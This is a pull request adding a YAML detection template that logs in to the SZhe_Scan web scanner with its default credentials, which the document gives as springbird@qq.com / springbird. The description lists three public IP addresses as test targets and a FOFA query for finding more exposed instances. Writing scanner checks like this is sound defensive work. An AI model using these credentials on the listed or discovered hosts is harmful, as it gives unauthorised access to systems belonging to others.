### PR TITLE
SZhe_Scan 碎遮Web漏洞扫描器默认账号密码

### DIFF
--- a/pocs/szhe-default-password.yml
+++ b/pocs/szhe-default-password.yml
@@ -1,0 +1,20 @@
+name: poc-yaml-szhe-default-password
+rules:
+  - method: GET
+    path: /login/
+    expression: |
+      response.status == 200 && response.body.bcontains(b"SZHE") && response.body.bcontains(b"login")
+  - method: POST
+    path: /login/
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    follow_redirects: false
+    body: |
+      email=springbird%40qq.com&password=springbird&remeber=true
+    expression: |
+      response.status == 302 && response.body.bcontains(b"<a href=\"/\">") && response.headers["Set-Cookie"] != ""
+detail:
+  author: tangshoupu
+  info: szhe-default-password[springbird@qq.com:springbird]
+  links:
+    - https://github.com/ihoneysec/SZhe_Scan


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
SZhe_Scan 碎遮Web漏洞扫描器默认账号密码
## 测试环境
http://8.131.77.45:5000
http://47.99.208.210:5000
http://47.103.212.137:5000
## 备注
### fofa语法：title="用户登录" && body="SZHE" && body="Web漏洞扫描器"
![image](https://user-images.githubusercontent.com/50769953/120058087-d9598d80-c07a-11eb-8f68-b089c37b31d3.png)



